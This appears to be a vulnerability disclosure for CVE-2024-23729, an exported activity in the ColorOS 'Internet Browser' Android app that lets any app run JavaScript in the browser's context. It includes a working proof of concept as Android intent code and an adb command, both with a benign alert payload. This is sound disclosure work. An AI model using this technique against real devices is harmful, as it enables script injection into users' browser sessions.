CVE-2024-23729## Vulnerability Report
### Overview:
A vulnerability has been discovered in the `com.heytap.browser` application on the Android platform. The vulnerability allows an attacker to execute arbitrary JavsScript code within the context of the application without any permissions.
### Application Details:
- **Vendor:** - ColorOS
- **Application Name:** 'Internet Browser' `com.heytap.browser`
- **Version:** 45.10.3.4.1
- **Component:** com.android.browser.RealBrowserActivity
### Vulnerability Details:
- **Vulnerability Type:** JavaScript Code Execution
- **Attack Vector:** Via an exported activity component
- **Permissions Required:** None
### Description:
The `com.android.browser.RealBrowserActivity` activity in the `com.heytap.browser` app is exported and can be invoked by any third-party application without requiring any permissions. A malicious app can exploit this to execute arbitrary JavaScript code within the context of the `com.heytap.browser`` application.
### Proof of Concept (PoC):
```
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
```
```
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity
```
### Impact:
Successful exploitation allows an attacker to:
- Execute arbitrary JavaScript code within the context of the `com.heytap.browser` app.
[4.0K] /data/pocs/bb2761e3b06b8185adfae5f7656ad08b4aceff42
├── [1.5K] CVE-2024-23729
└── [1.9K] README.md
1 directory, 2 files